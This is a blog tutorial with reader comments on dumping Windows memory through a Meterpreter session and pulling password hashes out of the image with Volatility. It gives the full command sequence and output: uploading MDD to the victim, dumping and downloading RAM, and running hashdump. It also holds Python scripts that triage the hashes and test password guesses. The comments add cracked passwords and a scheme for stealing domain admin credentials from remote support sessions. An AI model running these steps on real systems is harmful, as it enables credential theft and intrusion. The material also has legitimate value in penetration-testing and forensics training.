Sunday, March 8, 2009

Dumping Memory to Extract Password Hashes


Originally posted on Attack Research

Dumping memory with MDD using Meterpreter

adapted from: http://pauldotcom.com/wiki/index.php/Episode142

ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under the GPL by ManTech International. MDD can copy the complete contents of physical memory on Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2008.

After downloading MDD from the ManTech site, run the program from the command line. You need administrator rights on the box for this to work (see the comments below): reading physical memory is not something an unprivileged user can do.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Example:

C:\tools\mdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)
0 map operations failed

took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image". MDD's only job is to copy physical memory (and print the MD5 of what it wrote, which is worth keeping), so you will have to use another tool to analyze the memory image.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

Execute MDD to capture RAM on the victim machine. Here it runs inside an interactive (-i), hidden (-H) cmd.exe channel, so you see mdd's output, including the MD5 of the image, as it runs.

meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144

Alternatively, use execute to run the tool directly without opening a command prompt. It doesn't matter much either way: pulling 256+ MB of data over the session is not exactly "stealthy". Note that without -i, execute returns as soon as the process starts, so the dump is still being written when you get your prompt back.

meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.

Verify that the memory image has been written. Since execute does not wait for mdd to finish, check that the mdd process has exited (ps) and that the file size matches the physical memory size mdd reports before you download; a file that is still growing gives you a truncated image.

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download the memory dump using Meterpreter. This is the slow part: a few hundred MB over a Meterpreter channel takes a while, and when it completes it is worth comparing the MD5 mdd printed against the local copy.

meterpreter > download demo.dd .
[*] downloading: demo.dd -> .
[*] downloaded : demo.dd -> ./demo.dd

meterpreter >
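The download is the fragile step: hundreds of MB over a Meterpreter channel can be cut short, and an image written while mdd was still running is short as well. mdd's own console output already gives you the two values needed to check the copy, the size it dumped and the MD5 of what it wrote. The following Python is an added example (not from the original post and not part of MDD or Metasploit) that parses that output and checks the downloaded file against it. The mdd_style_output and demo helpers, and the 3 MiB throw-away file they build, are constructed stand-ins for a real image; the reading of mdd's "MB" as MiB is an assumption that matches the page's own numbers (130940 map operations of 4 KiB each is 536330240 bytes, or 511.48 MiB).

```python
import hashlib
import os
import re
import tempfile

# mdd's console output for the run above, copied from the page.
MDD_OUTPUT = """\
-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144
"""

MIB = 1024 * 1024  # assumption: mdd's "MB" is MiB (130940 * 4 KiB pages = 511.48 MiB)


def parse_mdd_output(text):
    """Extract what mdd reported: size in MiB, MD5 of the image, failed page maps."""
    size = re.search(r"Dumping ([\d.]+) MB of physical memory", text)
    md5 = re.search(r"MD5 is:\s*([0-9a-fA-F]{32})", text)
    failed = re.search(r"(\d+) map operations failed", text)
    if not (size and md5):
        raise ValueError("could not find size/MD5 in mdd output")
    return {"mb": float(size.group(1)), "md5": md5.group(1).lower(),
            "failed_maps": int(failed.group(1)) if failed else 0}


def md5_file(path, chunk=MIB):
    """Streaming MD5 so a multi-hundred-MB image is not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_dump(path, mdd_text, tolerance_mb=0.01):
    """Compare the downloaded image with what mdd said it wrote. Returns (ok, reasons)."""
    reported = parse_mdd_output(mdd_text)
    reasons = []
    actual_mb = os.path.getsize(path) / MIB
    if abs(actual_mb - reported["mb"]) > tolerance_mb:
        reasons.append(f"size {actual_mb:.2f} MB != reported {reported['mb']:.2f} MB "
                       "(dump still in progress, or download truncated)")
    local_md5 = md5_file(path)
    if local_md5 != reported["md5"]:
        reasons.append(f"MD5 {local_md5} != reported {reported['md5']}")
    if reported["failed_maps"]:
        reasons.append(f"{reported['failed_maps']} pages failed to map; image has holes")
    return not reasons, reasons


def mdd_style_output(path):
    """Synthesize a report in mdd's format for a local file (demo only, not real mdd output)."""
    mb = os.path.getsize(path) / MIB
    return (f"-> Dumping {mb:.2f} MB of physical memory to file '{os.path.basename(path)}'.\n"
            "0 map operations failed\n"
            f"MD5 is: {md5_file(path)}\n")


def demo():
    """Constructed image: the intact copy passes, a truncated copy fails on size and MD5."""
    fd, path = tempfile.mkstemp(suffix=".dd")
    with os.fdopen(fd, "wb") as f:
        f.write(os.urandom(3 * MIB))  # constructed stand-in for a downloaded image
    report = mdd_style_output(path)
    good_ok, _ = verify_dump(path, report)
    with open(path, "r+b") as f:
        f.truncate(2 * MIB)  # simulate an interrupted download
    bad_ok, reasons = verify_dump(path, report)
    os.remove(path)
    return good_ok, bad_ok, reasons


if __name__ == "__main__":
    print(parse_mdd_output(MDD_OUTPUT))
    print(demo())
```

In practice you paste the text mdd printed in the Meterpreter channel into mdd_text and point path at the file you downloaded; any non-empty reasons list means re-dump or re-download before spending time in Volatility, since a truncated image silently loses hives.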

Now that we have the .dd image locally, use the instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to pull the password hashes out of memory.

Volatility --> https://www.volatilesystems.com/default/volatility

Installation and getting started: download and unzip Volatility from the location above, then download and install the registry patches from http://moyix.blogspot.com/2009/01/registry-code-updates.html --> http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip. You will need to overwrite your existing forensics, memory_objects and memory_plugins folders. Once that is done, running python volatility should show the hivescan/hivelist commands, along with the other registry plugins (hashdump, lsadump, cachedump, printkey), under "Supported Plugin Commands":

$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree

Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry

memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. Run hivescan to get hive offsets

$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38

2. Run hivelist with the first hivescan offset

$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60 \WINDOWS\system32\config\software
0xe1a5a7e8 \WINDOWS\system32\config\default
0xe165cb60 \WINDOWS\system32\config\SAM
0xe1a4f770 \WINDOWS\system32\config\SECURITY
0xe1559b38 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Dump the password hashes, passing the virtual addresses of the system hive (-y) and the SAM hive (-s) from the hivelist output

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
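The hashdump output is pwdump format (user:RID:LM hash:NT hash:::), and a quick triage of it tells you what to crack first. The following Python is an added example, not part of the original post or of Volatility. It parses the lines above and applies three checks: an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 (MD4 of the empty string) is an empty password; an LM hash other than aad3b435b51404eeaad3b435b51404ee means a rainbow-table-crackable LM hash is stored; and an LM second half equal to aad3b435b51404ee means the password is 7 characters or fewer. It also carries a pure-Python MD4 (RFC 1320) so a candidate password can be checked against a dumped NT hash offline, since NT hashes are unsalted MD4 over the UTF-16LE password; hashlib's md4 is included here by hand because it is frequently unavailable under OpenSSL 3.

```python
import struct

# pwdump-format lines copied from the Volatility hashdump output above.
HASHDUMP_OUTPUT = """\
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

# LM hashes each 7-character half of the uppercased password separately; a half
# built from an empty (or absent) chunk always comes out as this constant.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), used here because hashlib.new('md4') often fails."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    round3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F = (b & c) | (~b & d)
            f = (b & c) | (~b & d)
            a, d, c, b = d, c, b, _rotl((a + f + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
        for i in range(16):  # round 2: G = majority(b, c, d), words in column order
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a, d, c, b = d, c, b, _rotl((a + g + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
        for i in range(16):  # round 3: H = b ^ c ^ d, bit-reversed word order
            h = b ^ c ^ d
            a, d, c, b = d, c, b, _rotl((a + h + x[round3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); unsalted, so dumped hashes compare directly."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_NT = nt_hash("")  # 31d6cfe0d16ae931b73c59d7e0c089c0


def parse_pwdump(text):
    """user:RID:LM:NT::: lines -> list of dicts; lines that do not fit are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def triage(entries):
    """Map each user to the findings that decide how (or whether) to crack it."""
    findings = {}
    for e in entries:
        notes = []
        if e["nt"] == EMPTY_NT:
            notes.append("empty password")
        elif e["lm"] != EMPTY_LM:
            notes.append("LM hash stored (rainbow-table crackable)")
            if e["lm"][16:] == EMPTY_LM_HALF:
                notes.append("password is 7 characters or fewer")
        else:
            notes.append("NT hash only (LM disabled or password longer than 14)")
        findings[e["user"]] = notes
    return findings


def check_guess(entries, password):
    """Users whose dumped NT hash matches a candidate password."""
    h = nt_hash(password)
    return [e["user"] for e in entries if e["nt"] == h]


if __name__ == "__main__":
    dump = parse_pwdump(HASHDUMP_OUTPUT)
    for user, notes in triage(dump).items():
        print(f"{user:18s} {'; '.join(notes)}")
    print("empty-password accounts:", check_guess(dump, ""))
```

Run against the dump above, triage flags Guest and Sarah as empty-password accounts and phoenix as an LM-hashed password of at most 7 characters, which is where a cracker should start; check_guess lets you confirm or refute any password a cracker (or a commenter) proposes without leaving Python.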

A couple of updates:

1. The hashdump step only works on XP SP2 & SP3 images, no Vista, no Server 2003. MDD will image those systems, but Volatility 1.3 only understands XP SP2/SP3 memory.

2. New home for volreg plugins: http://www.cc.gatech.edu/%7Ebrendan/volatility/

CG

13 comments:

Anonymous said...

Wow excellent tutorial.

Thx Chris

Matt Weir said...

Stupid question, but why would you bother dumping the memory for Windows password hashes since there are easier ways to get them? It looks like you already have administrator rights on the box you broke into. Does it work if you have lower privileges?

I do have to say though that it would be good to get full hard disk encryption passwords, (or at least the encryption keys), remotely.

BTW, great tutorial.

CG said...

@matt

Great question. I need to go back and reproduce as a non-admin user via client-side attack and see if you can actually get a memory dump.

If you can, then it has "some" value because now I could get the hashes where before I could not. If not, you can essentially get the same thing, since they are local hashes, using hashdump.

I just saw it on PDC and wanted to see if I could reproduce it and if it was useful.

I personally probably won't ever be able to use it on a pentest, as moving around 500+ MB of data would probably alert someone on the networks we usually take a look at. Someone in the Metasploit SILC channel suggested looking into packaging up the Python code into an .exe and seeing if you can do the processing victim-side. That may be useful as well. It would be bloated, but certainly less than 500 MB.

wishi said...

Normally you shouldn't be able to dump the memory of elevated processes.
What bugs me much more than hashes are authentications that (may) lie in RAM. If you grep through the dumps you can find a lot more.

Anyhow: Windows isn't well known for hardened user separation. So it seems to be a piece of cake nowadays to gain elevated privileges. ;)

Anonymous said...

Great writeup. I tried this out last weekend to see if I could squeeze it into an Exploitation class I was running. It's interesting stuff, but as somebody already pointed out, you can get these hashes other ways (hashdump from the PRIV module).

From my testing I couldn't manage to get a full memory dump without administrator permission on the target. Still, dumping the hashes is probably just the start of what can be done with the Volatility toolkit. I look forward to the next step.

Anonymous said...

Of course you can get the hashes through other techniques, but as we all know there are many ways to skin a cat, and the more techniques you know, the stronger your FU is.

Jean-Michel PICOD said...

On Vista (and maybe Seven too), it's even simpler because you don't have to upload the memory dump tool anymore. As far as I have seen, Vista automatically keeps an up-to-date hiberfil.sys (maybe in case of power failure).
So you already have a memory dump. You can also download pagefile.sys for even more fun recovering passwords.
Oh, and it's also true for some XP computers if they used the hibernate function at least once (though the file may be outdated...).

Anonymous said...

And your passwords are
Neon1996 (Administrator)
Neon96 (phoenix)

Unknown said...

I've tried this tutorial like 5 times, all with the same results. This is the error message:
ERR: Couldn't find subkey Lsa of Control
> Traceback (most recent call last):
> File "volatility", line 219, in
> main()
> File "volatility", line 215, in main
> command.execute()
> File "memory_plugins/registry/hashdump.py", line 67, in execute
> dump_memory_hashes(addr_space, types, self.opts.syshive, self.opts.samhive, Profile())
> File "/opt/metasploit3/msf3/Volatility/forensics/win32/hashdump.py", line 302, in dump_memory_hashes
> dump_hashes(sysaddr, samaddr, profile)
> File "/opt/metasploit3/msf3/Volatility/forensics/win32/hashdump.py", line 290, in dump_hashes
> hbootkey = get_hbootkey(samaddr,bootkey,profile)
> File "/opt/metasploit3/msf3/Volatility/forensics/win32/hashdump.py", line 156, in get_hbootkey
> md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
> TypeError: cannot concatenate 'str' and 'NoneType' objects
> ^C

I've tried every possible way to make it work, but it doesn't seem to work no matter what I do.

CG said...

@patrik

It's been a while, but I think this only worked on SP2 due to some issues with Volatility. There is a thread on their blog talking about it.

As you didn't say what OS you were trying it on, my first guess is that it's one of the unsupported OSes.

-CG

Unknown said...

The OS is XP SP2.
I'm running it in Sun VirtualBox, and my theory is that since the OS only uses like 192 MB of RAM, that might be the problem.

I've tried a different solution though, that actually worked.
I used mdd to dump the RAM on a Win7 client with 2 GB of RAM,
and ran a regular expression on the .dd file and grepped the hashes that way.

Unknown said...

Am I wrong in assuming that the most dangerous use is the following:
-You work in a big company with many Windows PCs. You log in via a domain controller, but (in case there are network problems) there is also a local admin account.
With rainbow tables, you can get the local admin account, so you log in as local admin. Then you call for remote support citing a possible problem. When the domain admin logs in remotely, you dump the memory and get admin access. Am I missing something here?

Anonymous said...

@Patrik:

What regular expression did you use for that job?